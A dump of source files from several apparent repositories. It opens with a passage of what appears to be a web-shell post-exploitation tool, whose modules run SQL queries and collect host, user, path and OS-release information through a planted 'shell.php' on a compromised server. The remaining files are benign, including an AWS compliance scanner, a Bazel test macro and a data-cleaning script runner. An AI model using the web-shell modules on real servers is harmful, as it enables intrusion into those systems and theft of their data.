foreach($content as $key => $value){echo $value . "|";} echo "\n";}}
pg_close();}""" ]),
self.support_vectors.add_vector('pg_fallback', 'shell.php', [ """$result = pg_query("$query");
if($result) {
while ($content = pg_fetch_row($result)) {
foreach($content as $key => $value){echo $value . "|";} echo "\n";}}
pg_close();"""])
def _set_args(self):
self.argparser.add_argument('-user', help='SQL username')
self.argparser.add_argument('-pass', help='SQL password')
self.argparser.add_argument('-host', help='DBMS host or host:port', default='127.0.0.1')
self.argparser.add_argument('-dbms', help='DBMS', choices = ['mysql', 'postgres'], default='mysql')
self.argparser.add_argument('-query', help='Execute single query')
def _init_stored_args(self):
self.stored_args_namespace = StoredNamespace()
setattr(self.stored_args_namespace, 'vector', '')
setattr(self.stored_args_namespace, 'prompt', 'SQL> ')
def _prepare(self):
self.args['vector'] = 'pg' if self.args['dbms'] == 'postgres' else 'mysql'
if not self.args['user'] or not self.args['pass']:
self.args['vector'] += '_fallback'
def _probe(self):
if not self.args['query']:
self._check_credentials()
while True:
self._result = None
self._output = ''
query = raw_input( getattr(self.stored_args_namespace,'prompt') ).strip()
if not query:
continue
self._result = self._query(query)
if self._result == None:
self.mprint('%s %s' % (WARN_NO_DATA, WARN_CHECK_CRED))
elif not self._result:
self.mprint(WARN_NO_DATA)
else:
self._stringify_result()
print self._output
else:
self._result = self._query(self.args['query'])
if self._result == None:
self.mprint('%s, %s.' % (WARN_NO_DATA, WARN_CHECK_CRED))
def _query(self, query):
result = self.support_vectors.get(self.args['vector']).execute({ 'host' : self.args['host'], 'user' : self.args['user'], 'pass' : self.args['pass'], 'query' : query })
if result:
return [ line.split('|') for line in result[:-1].replace('|\n', '\n').split('\n') ]
def _check_credentials(self):
get_current_user = 'SELECT USER;' if self.args['dbms'] == 'postgres' else 'SELECT USER();'
user = self.support_vectors.get(self.args['vector']).execute({ 'host' : self.args['host'], 'user' : self.args['user'], 'pass' : self.args['pass'], 'query' : get_current_user })
if user:
user = user[:-1]
setattr(self.stored_args_namespace, 'vector', self.args['vector'])
setattr(self.stored_args_namespace, 'prompt', '%s SQL> ' % user)
else:
raise ProbeException(self.name, "%s of %s " % (WARN_CHECK_CRED, self.args['host']) )
```
#### File: modules/system/info.py
```python
from core.module import Module
from core.moduleexception import ModuleException
from core.argparse import ArgumentParser
from core.vector import VectorsDict
import urllib2
from re import compile
re_lsb_release = compile('Description:[ \t]+(.+)')
re_etc_lsb_release = compile('(?:DISTRIB_DESCRIPTION|PRETTY_NAME)="(.+)"')
re_exitaddress = compile('\nExitAddress[\s]+([^\s]+)')
WARN_NO_EXITLIST = 'Error downloading TOR exit list'
class Info(Module):
"""Collect system informations"""
def _set_vectors(self):
self.support_vectors.add_vector('document_root', 'shell.php', "@print($_SERVER['DOCUMENT_ROOT']);"),
self.support_vectors.add_vector('whoami', 'shell.php', "$u=@posix_getpwuid(posix_geteuid()); if($u) { $u = $u['name']; } else { $u=getenv('username'); } print($u);"),
self.support_vectors.add_vector('hostname', 'shell.php', "@print(gethostname());"),
self.support_vectors.add_vector('cwd', 'shell.php', "@print(getcwd());"),
self.support_vectors.add_vector('open_basedir', 'shell.php', "$v=@ini_get('open_basedir'); if($v) print($v);"),
self.support_vectors.add_vector('safe_mode', 'shell.php', "(ini_get('safe_mode') && print(1)) || print(0);"),
self.support_vectors.add_vector('script', 'shell.php', "@print($_SERVER['SCRIPT_NAME']);"),
self.support_vectors.add_vector('uname', 'shell.php', "@print(php_uname());"),
self.support_vectors.add_vector('os', 'shell.php', "@print(PHP_OS);"),
self.support_vectors.add_vector('client_ip', 'shell.php', "@print($_SERVER['REMOTE_ADDR']);"),
self.support_vectors.add_vector('max_execution_time', 'shell.php', '@print(ini_get("max_execution_time"));'),
self.support_vectors.add_vector('php_self', 'shell.php', '@print($_SERVER["PHP_SELF"]);')
self.support_vectors.add_vector('dir_sep' , 'shell.php', '@print(DIRECTORY_SEPARATOR);')
self.support_vectors.add_vector('php_version' , 'shell.php', "$v=''; if(function_exists( 'phpversion' )) { $v=phpversion(); } elseif(defined('PHP_VERSION')) { $v=PHP_VERSION; } elseif(defined('PHP_VERSION_ID')) { $v=PHP_VERSION_ID; } print($v);")
self.release_support_vectors = VectorsDict(self.modhandler)
self.release_support_vectors.add_vector('lsb_release' , 'shell.sh', 'lsb_release -d')
self.release_support_vectors.add_vector('read' , 'file.read', '$rpath')
def _set_args(self):
additional_args = ['all', 'release', 'check_tor']
self.argparser.add_argument('info', help='Information', choices = self.support_vectors.keys() + additional_args, default='all', nargs='?')
def __check_tor(self):
exitlist_urls = ('http://exitlist.torproject.org/exit-addresses', 'http://exitlist.torproject.org/exit-addresses.new')
exitlist_content = ''
for url in exitlist_urls:
try:
exitlist_content += urllib2.urlopen(url, timeout=1).read() + '\n'
except Exception, e:
self.mprint('%s: \'%s\'' % ( WARN_NO_EXITLIST, url))
addresses = re_exitaddress.findall(exitlist_content)
client_ip = self.support_vectors.get('client_ip').execute()
return client_ip in addresses
def __guess_release(self):
lsb_release_output = self.release_support_vectors.get('lsb_release').execute()
if lsb_release_output:
rel = re_lsb_release.findall(lsb_release_output)
if rel: return rel[0]
for rpath in ('/etc/lsb-release', '/etc/os-release',):
etc_lsb_release_content = self.release_support_vectors.get('read').execute({'rpath' : rpath})
if etc_lsb_release_content:
rel = re_etc_lsb_release.findall(etc_lsb_release_content)
if rel: return rel[0]
for rpath in ('/etc/issue.net', '/etc/issue',):
etc_issue_content = self.release_support_vectors.get('read').execute({'rpath' : rpath}).strip()
if etc_issue_content:
return etc_issue_content
return ''
def _probe(self):
if self.args['info'] == 'check_tor':
self._result = self.__check_tor()
elif self.args['info'] == 'release':
self._result = self.__guess_release().strip()
elif self.args['info'] != 'all':
self._result = self.support_vectors.get(self.args['info']).execute()
else:
self._result = {}
for vect in self.support_vectors.values():
self._result[vect.name] = vect.execute()
self._result['release'] = self.__guess_release()
self._result['check_tor'] = self.__check_tor()
```
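The release-detection regexes above are easiest to understand against concrete input. Here is a minimal sketch, assuming typical `lsb_release -d` and `/etc/os-release` lines (the sample strings are illustrative, not captured from a real host):
```python
from re import compile

re_lsb_release = compile('Description:[ \t]+(.+)')
re_etc_lsb_release = compile('(?:DISTRIB_DESCRIPTION|PRETTY_NAME)="(.+)"')

# Illustrative inputs only.
print(re_lsb_release.findall('Description:\tUbuntu 12.04 LTS'))
# ['Ubuntu 12.04 LTS']
print(re_etc_lsb_release.findall('PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"'))
# ['Debian GNU/Linux 7 (wheezy)']
```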
|
{
"source": "jez/as-tree-cpp",
"score": 2
}
|
#### File: as-tree-cpp/test/diff_tests.bzl
```python
def diff_tests(input_files):
tests = []
updates = []
for input_file in input_files:
genrule_name = "gen_{}.actual".format(input_file)
actual_file = "{}.actual".format(input_file)
native.genrule(
name = genrule_name,
srcs = [input_file],
outs = [actual_file],
tools = ["//main:as-tree"],
cmd = "$(location //main:as-tree) $(location {input_file}) > $(location {actual_file})".format(
input_file = input_file,
actual_file = actual_file
),
testonly = True,
# This is manual to avoid being caught with `//...`
tags = ["manual"],
)
test_name = "test_{}".format(input_file)
exp_file = "{}.exp".format(input_file)
native.sh_test(
name = test_name,
srcs = ["diff_one.sh"],
args = [
"$(location {})".format(exp_file),
"$(location {})".format(actual_file),
],
data = [
exp_file,
actual_file,
],
size = "small",
tags = [],
)
update_name = "update_{}".format(input_file)
native.sh_test(
name = update_name,
srcs = ["update_one.sh"],
args = [
"$(location {})".format(actual_file),
"$(location {})".format(exp_file),
],
data = [
actual_file,
exp_file,
],
size = "small",
tags = [
# Avoid being caught with `//...`
"manual",
# Forces the test to be run locally, without sandboxing
"local",
# Unconditionally run this rule, and don't run in the sandbox
"external",
],
)
tests.append(test_name)
updates.append(update_name)
native.test_suite(
name = "test",
tests = tests,
)
native.test_suite(
name = "update",
tests = updates,
tags = ["manual"],
)
```
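A possible `BUILD` file invocation of this macro is sketched below; the fixture file names are assumptions, and each input file is expected to have a matching `.exp` file next to it:
```python
# test/BUILD (hypothetical)
load(":diff_tests.bzl", "diff_tests")

diff_tests(
    input_files = [
        "fixtures/simple.txt",   # assumed fixture; needs fixtures/simple.txt.exp
        "fixtures/nested.txt",   # assumed fixture; needs fixtures/nested.txt.exp
    ],
)
```
With that in place, and assuming the package is `//test`, `bazel test //test:test` runs the diff tests, while the manually tagged `//test:update` suite regenerates the `.exp` files on demand.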
|
{
"source": "jez/awkward-bun",
"score": 2
}
|
#### File: jez/awkward-bun/util.py
```python
from __future__ import print_function
import settings
def log(*args, **kwargs):
if settings.DEBUG:
print(*args, **kwargs)
def output(*args, **kwargs):
if not settings.DEBUG:
print(*args, **kwargs)
```
|
{
"source": "jezcope/pyrefine",
"score": 4
}
|
#### File: pyrefine/pyrefine/script.py
```python
import json
import os
from .ops import create
class Script(object):
"""A script is a series of operations."""
def __init__(self, s=None):
"""Parse a script from a JSON string."""
if s is not None:
self.parsed_script = json.loads(s)
self.operations = [create(params)
for params in self.parsed_script]
def __len__(self):
"""Return the number of operations."""
return len(self.operations)
def execute(self, data):
"""Execute all operations on the provided dataset.
Args:
data (:class:`pandas.DataFrame`): The data to transform. Not
guaranteed immutable.
Returns:
:class:`pandas.DataFrame`: The transformed data.
"""
for op in self.operations:
data = op(data)
return data
def load_script(f):
"""Load and parse the script given.
Args:
f (:class:`file` or :class:`str`): Open file object or filename.
Returns:
:class:`Script`: The parsed script object.
"""
if isinstance(f, (str, os.PathLike)):
f = open(f)
with f:
return parse(f.read())
parse = Script
```
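A minimal usage sketch of this API, assuming an OpenRefine operation-history export `clean_data.json` and an input CSV `dirty_data.csv` (both file names are hypothetical):
```python
import pandas as pd

from pyrefine.script import load_script

script = load_script('clean_data.json')   # parse the exported operations
print(len(script))                        # number of operations in the script

data = pd.read_csv('dirty_data.csv')
clean = script.execute(data)              # returns the transformed DataFrame
clean.to_csv('clean_data.csv', index=False)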
|
{
"source": "jezd-axyl/platsec-aws-scanner",
"score": 2
}
|
#### File: platsec-aws-scanner/src/aws_scanner_main.py
```python
import logging
from src.aws_parallel_task_runner import AwsParallelTaskRunner
from src.aws_scanner_output import AwsScannerOutput
from src.aws_task_builder import AwsTaskBuilder
from src.clients.aws_client_factory import AwsClientFactory
from src.aws_scanner_argument_parser import AwsScannerArguments
from src.data.aws_scanner_exceptions import AwsScannerException
class AwsScannerMain:
def __init__(self, args: AwsScannerArguments) -> None:
self._main(args)
def _main(self, args: AwsScannerArguments) -> None:
logger = self._configure_logging(args)
try:
factory = AwsClientFactory(mfa=args.mfa_token, username=args.username)
tasks = AwsTaskBuilder(factory, args).build_tasks()
reports = AwsParallelTaskRunner(factory).run(tasks)
AwsScannerOutput(factory).write(args.task, reports)
except AwsScannerException as ex:
logger.error(f"{type(ex).__name__}: {ex}")
raise SystemExit(1)
def _configure_logging(self, args: AwsScannerArguments) -> logging.Logger:
logging.basicConfig(
level=args.log_level,
datefmt="%Y-%m-%dT%H:%M:%S",
format="%(asctime)s %(levelname)s %(module)s %(message)s",
)
logging.getLogger().setLevel(args.log_level)
logging.getLogger("botocore").setLevel(logging.ERROR)
logging.getLogger("urllib3").setLevel(logging.ERROR)
logging.getLogger("requests").setLevel(logging.ERROR)
return logging.getLogger(self.__class__.__name__)
```
#### File: platsec-aws-scanner/src/aws_task_runner.py
```python
from inspect import signature
from logging import getLogger
from typing import Any, Callable, Dict, Sequence, Type
from src.data.aws_scanner_exceptions import UnsupportedClientException
from src.data.aws_task_report import AwsTaskReport
from src.clients.aws_client_factory import AwsClientFactory
from src.tasks.aws_task import AwsTask
from src.clients.aws_athena_client import AwsAthenaClient
from src.clients.aws_cost_explorer_client import AwsCostExplorerClient
from src.clients.aws_iam_audit_client import AwsIamAuditClient
from src.clients.aws_iam_client import AwsIamClient
from src.clients.aws_organizations_client import AwsOrganizationsClient
from src.clients.aws_ssm_client import AwsSSMClient
from src.clients.aws_s3_client import AwsS3Client
from src.clients.composite.aws_central_logging_client import AwsCentralLoggingClient
from src.clients.composite.aws_cloudtrail_client import AwsCloudtrailClient
from src.clients.composite.aws_vpc_client import AwsVpcClient
class AwsTaskRunner:
def __init__(self, client_factory: AwsClientFactory) -> None:
self._logger = getLogger(self.__class__.__name__)
self._client_factory = client_factory
def run(self, tasks: Sequence[AwsTask]) -> Sequence[AwsTaskReport]:
return self._run_tasks(tasks)
def _run_tasks(self, tasks: Sequence[AwsTask]) -> Sequence[AwsTaskReport]:
raise NotImplementedError("this is an abstract class")
def _run_task(self, task: AwsTask) -> AwsTaskReport:
client_param = signature(task._run_task).parameters.get("client")
task_client_mapping: Dict[Type[Any], Callable[[], AwsTaskReport]] = {
AwsAthenaClient: lambda: task.run(self._client_factory.get_athena_client()),
AwsCloudtrailClient: lambda: task.run(self._client_factory.get_cloudtrail_client(task.account)),
AwsCostExplorerClient: lambda: task.run(self._client_factory.get_cost_explorer_client(task.account)),
AwsIamClient: lambda: task.run(self._client_factory.get_iam_client(task.account)),
AwsIamAuditClient: lambda: task.run(self._client_factory.get_iam_client_for_audit(task.account)),
AwsOrganizationsClient: lambda: task.run(self._client_factory.get_organizations_client()),
AwsSSMClient: lambda: task.run(self._client_factory.get_ssm_client(task.account)),
AwsS3Client: lambda: task.run(self._client_factory.get_s3_client(task.account)),
AwsVpcClient: lambda: task.run(self._client_factory.get_vpc_client(task.account)),
AwsCentralLoggingClient: lambda: task.run(self._client_factory.get_central_logging_client()),
}
if not client_param:
raise UnsupportedClientException(f"{task} requires a client argument")
if client_param.annotation not in task_client_mapping:
raise UnsupportedClientException(f"client type {client_param.annotation} is not supported")
return task_client_mapping[client_param.annotation]()
```
#### File: src/clients/aws_athena_async_client.py
```python
from logging import getLogger
from string import Template
from time import sleep
from typing import Any, Dict, List, Type
from botocore.client import BaseClient
from botocore.exceptions import BotoCoreError, ClientError
from src.data import aws_scanner_exceptions as exceptions
from src.clients import aws_athena_system_queries as queries
from src.data.aws_athena_data_partition import AwsAthenaDataPartition
from src.clients.aws_athena_query_states import COMPLETED_STATES, SUCCESS_STATES
from src.data.aws_organizations_types import Account
from src.aws_scanner_config import AwsScannerConfig as Config
class AwsAthenaAsyncClient:
def __init__(self, boto_athena: BaseClient):
self._logger = getLogger(self.__class__.__name__)
self._boto_athena = boto_athena
self._catalog = "AwsDataCatalog"
self._config = Config()
def create_database(self, database_name: str) -> str:
self._logger.info(f"creating database {database_name}")
return self.run_query(
query=Template(queries.CREATE_DATABASE).substitute(database_name=database_name),
raise_on_failure=exceptions.CreateDatabaseException,
)
def drop_database(self, database_name: str) -> str:
self._logger.info(f"dropping database {database_name}")
return self.run_query(
query=Template(queries.DROP_DATABASE).substitute(database_name=database_name),
raise_on_failure=exceptions.DropDatabaseException,
)
def create_table(self, database: str, account: Account) -> str:
self._logger.info(f"creating table {account.identifier} in database {database}")
return self.run_query(
query=Template(queries.CREATE_TABLE).substitute(
account=account.identifier, cloudtrail_logs_bucket=self._config.cloudtrail_logs_bucket()
),
database=database,
raise_on_failure=exceptions.CreateTableException,
)
def drop_table(self, database: str, table: str) -> str:
self._logger.info(f"dropping table {table} in database {database}")
return self.run_query(
query=Template(queries.DROP_TABLE).substitute(table=table),
database=database,
raise_on_failure=exceptions.DropTableException,
)
def add_partition(self, database: str, account: Account, partition: AwsAthenaDataPartition) -> str:
self._logger.info(f"loading {partition} for table {account.identifier} in database {database}")
return self.run_query(
query=Template(queries.ADD_PARTITION_YEAR_MONTH).substitute(
account=account.identifier,
cloudtrail_logs_bucket=self._config.cloudtrail_logs_bucket(),
region=partition.region,
year=partition.year,
month=partition.month,
),
database=database,
raise_on_failure=exceptions.AddPartitionException,
)
def has_query_completed(self, query_id: str) -> bool:
return self._is_query_state_in(query_id, COMPLETED_STATES)
def has_query_succeeded(self, query_id: str) -> bool:
return self._is_query_state_in(query_id, SUCCESS_STATES)
def get_query_results(self, query_id: str) -> List[Any]:
self._logger.debug(f"fetching results for query {query_id}")
try:
query_result_response = self._boto_athena.get_query_results(QueryExecutionId=query_id)
return list(query_result_response["ResultSet"]["Rows"][1:])
except (BotoCoreError, ClientError) as error:
raise exceptions.GetQueryResultsException(f"query {query_id} results unknown: {error}") from None
def get_query_error(self, query_id: str) -> str:
return str(self._get_query_execution(query_id)["QueryExecution"]["Status"]["StateChangeReason"])
def run_query(
self,
query: str,
database: str = "",
raise_on_failure: Type[Exception] = exceptions.RunQueryException,
) -> str:
sleep(self._config.athena_query_throttling_seconds())
self._logger.debug(f"running query {query}")
try:
query_execution_response = self._boto_athena.start_query_execution(
QueryString=query,
QueryExecutionContext=self._build_exec_context(database),
ResultConfiguration={"OutputLocation": f"s3://{self._config.athena_query_results_bucket()}"},
)
return str(query_execution_response["QueryExecutionId"])
except (BotoCoreError, ClientError) as error:
raise raise_on_failure(f"query execution failure: {error}") from None
def list_tables(self, database: str) -> List[str]:
self._logger.info(f"listing tables in database {database}")
try:
response = self._boto_athena.list_table_metadata(CatalogName=self._catalog, DatabaseName=database)
return [table["Name"] for table in response["TableMetadataList"]]
except (BotoCoreError, ClientError) as error:
raise exceptions.ListTablesException(error) from None
def list_databases(self) -> List[str]:
self._logger.info("listing databases")
try:
response = self._boto_athena.list_databases(CatalogName=self._catalog)
return [db["Name"] for db in response["DatabaseList"]]
except (BotoCoreError, ClientError) as error:
raise exceptions.ListTablesException(error) from None
def _is_query_state_in(self, query_id: str, expected_states: List[str]) -> bool:
return self._get_query_execution(query_id)["QueryExecution"]["Status"]["State"] in expected_states
def _build_exec_context(self, database: str) -> Dict[str, str]:
return {"Catalog": self._catalog, "Database": database} if database else {"Catalog": self._catalog}
def _get_query_execution(self, query_id: str) -> Dict[Any, Any]:
self._logger.debug(f"polling execution state for query {query_id}")
try:
return dict(self._boto_athena.get_query_execution(QueryExecutionId=query_id))
except (BotoCoreError, ClientError) as error:
raise exceptions.UnknownQueryStateException(f"query {query_id} state unknown: {error}") from None
```
#### File: src/data/aws_cloudtrail_types.py
```python
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Dict, Sequence
@dataclass
class Trail:
name: str
s3_bucket_name: str
is_logging: bool
is_multiregion_trail: bool
kms_key_id: str
log_file_validation_enabled: bool
include_global_service_events: bool
event_selectors: Sequence[EventSelector]
def to_trail(trail: Dict[str, Any]) -> Trail:
return Trail(
name=trail["Name"],
s3_bucket_name=trail.get("S3BucketName") or "",
is_logging=False,
is_multiregion_trail=trail["IsMultiRegionTrail"],
kms_key_id=trail.get("KmsKeyId") or "",
log_file_validation_enabled=trail["LogFileValidationEnabled"],
include_global_service_events=trail["IncludeGlobalServiceEvents"],
event_selectors=[],
)
@dataclass
class EventSelector:
read_write_type: str
include_management_events: bool
data_resources: Sequence[DataResource]
def to_event_selector(es: Dict[str, Any]) -> EventSelector:
return EventSelector(
read_write_type=es["ReadWriteType"],
include_management_events=es["IncludeManagementEvents"],
data_resources=[to_data_resource(dr) for dr in es["DataResources"]],
)
@dataclass
class DataResource:
type: str
values: Sequence[str]
def to_data_resource(dr: Dict[str, Any]) -> DataResource:
return DataResource(type=dr["Type"], values=dr["Values"])
```
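As a quick illustration of the converter, here is a hedged sketch of `to_trail` applied to a `describe_trails`-style dict; the field values are made up, and `is_logging`/`event_selectors` start empty because they are presumably filled in later from separate API calls:
```python
sample = {
    "Name": "audit-trail",              # illustrative values
    "S3BucketName": "audit-logs-bucket",
    "IsMultiRegionTrail": True,
    "KmsKeyId": "",
    "LogFileValidationEnabled": True,
    "IncludeGlobalServiceEvents": True,
}
trail = to_trail(sample)
assert trail.s3_bucket_name == "audit-logs-bucket"
assert trail.is_logging is False       # not part of describe_trails output
assert trail.event_selectors == []     # populated separately via to_event_selector
```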
#### File: src/data/aws_iam_types.py
```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Dict, Optional, Sequence, Set
from src.data import is_list
from src.data.aws_common_types import Tag
from src.data.aws_scanner_exceptions import UnsupportedPolicyDocumentElement
@dataclass
class Role:
name: str
arn: str
assume_policy: Dict[str, Any]
policies: Sequence[Policy]
tags: Sequence[Tag]
def __init__(
self,
name: str,
arn: str,
assume_policy: Dict[str, Any],
policies: Optional[Sequence[Policy]] = None,
tags: Optional[Sequence[Tag]] = None,
):
self.name = name
self.arn = arn
self.assume_policy = assume_policy
self.policies = policies or []
self.tags = tags or []
def to_role(role: Dict[Any, Any]) -> Role:
return Role(
name=role["RoleName"],
arn=role["Arn"],
assume_policy=role["AssumeRolePolicyDocument"],
tags=[Tag(tag["Key"], tag["Value"]) for tag in role["Tags"]] if role.get("Tags") else [],
)
@dataclass
class Policy:
name: str
arn: str
default_version: str
document: Optional[Dict[str, Any]] = None
def doc_equals(self, doc: Dict[str, Any]) -> bool:
unrolled = self._unroll_statements(self.document) if self.document else set()
return unrolled == self._unroll_statements(doc)
def _unroll_statements(self, doc: Dict[str, Any]) -> Set[Statement]:
unrolled = set()
statements = doc["Statement"] if is_list(doc["Statement"]) else [doc["Statement"]]
for s in self._validate_statements(statements):
actions = s["Action"] if is_list(s["Action"]) else [s["Action"]]
resources = s["Resource"] if is_list(s["Resource"]) else [s["Resource"]]
for a in actions:
for r in resources:
unrolled.add(Statement(action=a, resource=r, effect=s["Effect"], condition=str(s.get("Condition"))))
return unrolled
@staticmethod
def _validate_statements(statements: Sequence[Dict[str, Any]]) -> Sequence[Dict[str, Any]]:
unsupported_elements = ["NotAction", "NotResource", "Principal", "NotPrincipal"]
invalid_statements = [s for s in statements if any(element in s for element in unsupported_elements)]
if invalid_statements:
raise UnsupportedPolicyDocumentElement(f"one of {unsupported_elements} found in {invalid_statements}")
return statements
def to_policy(policy: Dict[Any, Any]) -> Policy:
return Policy(name=policy["PolicyName"], arn=policy["Arn"], default_version=policy["DefaultVersionId"])
@dataclass(frozen=True)
class Statement:
action: str
condition: Optional[str]
effect: str
resource: str
@dataclass
class User:
user_name: str
@dataclass
class AccessKey:
id: str
user_name: str
created: datetime
last_used: Optional[datetime] = None
@dataclass
class PasswordPolicy:
minimum_password_length: Optional[int]
require_symbols: Optional[bool]
require_numbers: Optional[bool]
require_uppercase_chars: Optional[bool]
require_lowercase_chars: Optional[bool]
allow_users_to_change_password: Optional[bool]
expire_passwords: Optional[bool]
max_password_age: Optional[int]
password_reuse_prevention: Optional[int]
hard_expiry: Optional[bool]
def to_password_policy(policy_response: Dict[str, Any]) -> PasswordPolicy:
password_policy = policy_response["PasswordPolicy"]
return PasswordPolicy(
minimum_password_length=password_policy.get("MinimumPasswordLength"),
require_symbols=password_policy.get("RequireSymbols"),
require_numbers=password_policy.get("RequireNumbers"),
require_uppercase_chars=password_policy.get("RequireUppercaseCharacters"),
require_lowercase_chars=password_policy.get("RequireLowercaseCharacters"),
allow_users_to_change_password=password_policy.get("AllowUsersToChangePassword"),
expire_passwords=password_policy.get("ExpirePasswords"),
max_password_age=password_policy.get("MaxPasswordAge"),
password_reuse_prevention=password_policy.get("PasswordReusePrevention"),
hard_expiry=password_policy.get("HardExpiry"),
)
```
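The statement unrolling in `Policy.doc_equals` means that scalar and list forms of `Statement`/`Action`/`Resource` compare equal once expanded. A small sketch (the policy name and ARN are illustrative):
```python
doc_a = {"Statement": [{"Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"], "Resource": "*"}]}
doc_b = {"Statement": {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "*"}}

p = Policy(name="example", arn="arn:aws:iam::123456789012:policy/example", default_version="v1", document=doc_a)
assert not p.doc_equals(doc_b)  # doc_b lacks s3:PutObject
assert p.doc_equals({"Statement": [
    {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "*"},
    {"Effect": "Allow", "Action": "s3:PutObject", "Resource": "*"},
]})  # same statements once unrolled
```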
#### File: platsec-aws-scanner/src/json_serializer.py
```python
import datetime
from json import dumps
from typing import Any
def to_json(obj: Any) -> str:
return dumps(
obj,
default=lambda o: {
k: _datetime_to_string(v) for k, v in vars(o).items() if _is_public(k) and v and not callable(v)
},
)
def _is_public(prop: str) -> bool:
return not prop.startswith("_")
def _datetime_to_string(o: Any) -> Any:
if isinstance(o, datetime.datetime):
return o.isoformat()
else:
return o
```
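A minimal check of `to_json`'s behaviour: private attributes, falsy values and callables are dropped, and datetimes are rendered as ISO-8601 strings (the class and values below are illustrative):
```python
import datetime


class Example:
    def __init__(self) -> None:
        self.name = "scan"
        self.when = datetime.datetime(2021, 6, 1, 12, 30)
        self.empty = None            # dropped: falsy
        self._internal = "hidden"    # dropped: private
        self.action = lambda: None   # dropped: callable


print(to_json(Example()))
# {"name": "scan", "when": "2021-06-01T12:30:00"}
```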
#### File: src/tasks/aws_athena_cleaner_task.py
```python
from dataclasses import dataclass
from typing import Any, Dict, List
from src.clients.aws_athena_client import AwsAthenaClient
from src.tasks.aws_athena_task import AwsAthenaTask
from src.aws_scanner_config import AwsScannerConfig as Config
@dataclass
class AwsAthenaCleanerTask(AwsAthenaTask):
def __init__(self) -> None:
super().__init__("clean scanner leftovers", Config().athena_account())
def _run_task(self, client: AwsAthenaClient) -> Dict[Any, Any]:
databases = self._list_scanner_databases(client)
dropped_tables = [table for tables in [self._drop_tables(client, db) for db in databases] for table in tables]
dropped_databases = [self._drop_database(client, db) for db in databases]
return {"dropped_tables": dropped_tables, "dropped_databases": dropped_databases}
@staticmethod
def _drop_tables(client: AwsAthenaClient, database: str) -> List[str]:
return [AwsAthenaCleanerTask._drop_table(client, database, table) for table in client.list_tables(database)]
@staticmethod
def _drop_database(client: AwsAthenaClient, database: str) -> str:
client.drop_database(database)
return database
@staticmethod
def _list_scanner_databases(client: AwsAthenaClient) -> List[str]:
return list(filter(lambda db: db.startswith(Config().athena_database_prefix()), client.list_databases()))
@staticmethod
def _drop_table(client: AwsAthenaClient, database: str, table: str) -> str:
client.drop_table(database, table)
return f"{database}.{table}"
```
#### File: src/tasks/aws_athena_task.py
```python
from typing import Any, Dict
from src.clients.aws_athena_client import AwsAthenaClient
from src.tasks.aws_task import AwsTask
class AwsAthenaTask(AwsTask):
def _run_task(self, client: AwsAthenaClient) -> Dict[Any, Any]:
raise NotImplementedError("this is an abstract class")
```
#### File: src/tasks/aws_audit_password_policy_task.py
```python
from typing import Any, Dict
from src.aws_scanner_config import AwsScannerConfig as Config
from src.clients.aws_iam_client import AwsIamClient
from src.data.aws_compliance_actions import UpdatePasswordPolicyAction
from src.data.aws_organizations_types import Account
from src.tasks.aws_task import AwsTask
class AwsAuditPasswordPolicyTask(AwsTask):
def __init__(self, account: Account, enforce: bool) -> None:
super().__init__("audit password policy compliance", account)
self.enforce = enforce
def _run_task(self, client: AwsIamClient) -> Dict[Any, Any]:
reference_policy = Config().iam_password_policy()
current_policy = client.get_account_password_policy()
actions = [] if current_policy == reference_policy else [UpdatePasswordPolicyAction(iam=client)]
action_reports = list(map(lambda a: a.apply() if self.enforce else a.plan(), actions))
return {"password_policy": current_policy, "enforcement_actions": action_reports}
```
#### File: src/tasks/aws_audit_vpc_flow_logs_task.py
```python
from dataclasses import dataclass
from typing import Any, Dict
from src.clients.composite.aws_vpc_client import AwsVpcClient
from src.data.aws_organizations_types import Account
from src.tasks.aws_vpc_task import AwsVpcTask
@dataclass
class AwsAuditVPCFlowLogsTask(AwsVpcTask):
def __init__(self, account: Account, enforce: bool, with_subscription_filter: bool) -> None:
super().__init__("audit VPC flow logs compliance", account, enforce)
self.with_subscription_filter = with_subscription_filter
def _run_task(self, client: AwsVpcClient) -> Dict[Any, Any]:
vpcs = client.list_vpcs()
actions = client.enforcement_actions(vpcs, self.with_subscription_filter)
if self.enforce:
apply = [a.apply() for a in actions]
return {"vpcs": vpcs, "enforcement_actions": apply}
else:
plans = [a.plan() for a in actions]
return {"vpcs": vpcs, "enforcement_actions": plans}
```
#### File: src/tasks/aws_task.py
```python
from typing import Any, Dict
from logging import getLogger
from src.data.aws_task_report import AwsTaskReport
from src.data.aws_organizations_types import Account
class AwsTask:
def __init__(self, description: str, account: Account):
self._logger = getLogger(self.__class__.__name__)
self._description = description
self._account = account
def run(self, client: Any) -> AwsTaskReport:
self._logger.info(f"running {self}")
return AwsTaskReport(
account=self._account, description=self._description, partition=None, results=self._run_task(client)
)
@property
def account(self) -> Account:
return self._account
def _run_task(self, client: Any) -> Dict[Any, Any]:
raise NotImplementedError("this is an abstract class")
def __str__(self) -> str:
return f"task '{self._description}' for '{self._account}'"
```
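`AwsTask` is a template-method base class: `run` handles logging and report building, while subclasses implement `_run_task` and declare, via the `client` type annotation, which client `AwsTaskRunner` should inject. A hypothetical concrete task (not part of the scanner) might look like this:
```python
from typing import Any, Dict

from src.clients.aws_athena_client import AwsAthenaClient
from src.data.aws_organizations_types import Account
from src.tasks.aws_task import AwsTask


class ListDatabasesTask(AwsTask):  # illustrative example only
    def __init__(self, account: Account) -> None:
        super().__init__("list Athena databases", account)

    def _run_task(self, client: AwsAthenaClient) -> Dict[Any, Any]:
        # the AwsAthenaClient annotation is what AwsTaskRunner inspects to decide
        # which factory method to call (get_athena_client in this case)
        return {"databases": client.list_databases()}
```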
#### File: src/tasks/aws_vpc_task.py
```python
from typing import Any, Dict
from src.clients.composite.aws_vpc_client import AwsVpcClient
from src.data.aws_organizations_types import Account
from src.tasks.aws_task import AwsTask
class AwsVpcTask(AwsTask):
def __init__(self, description: str, account: Account, enforce: bool):
super().__init__(description, account)
self._enforce = enforce
@property
def enforce(self) -> bool:
return self._enforce
def _run_task(self, client: AwsVpcClient) -> Dict[Any, Any]:
raise NotImplementedError("this is an abstract class")
```
#### File: clients/composite/test_aws_central_logging_client.py
```python
from unittest.mock import Mock
from src.clients.composite.aws_central_logging_client import AwsCentralLoggingClient
from tests.test_types_generator import account, bucket, key
def client(s3: Mock = Mock(), kms: Mock = Mock(), org: Mock = Mock()) -> AwsCentralLoggingClient:
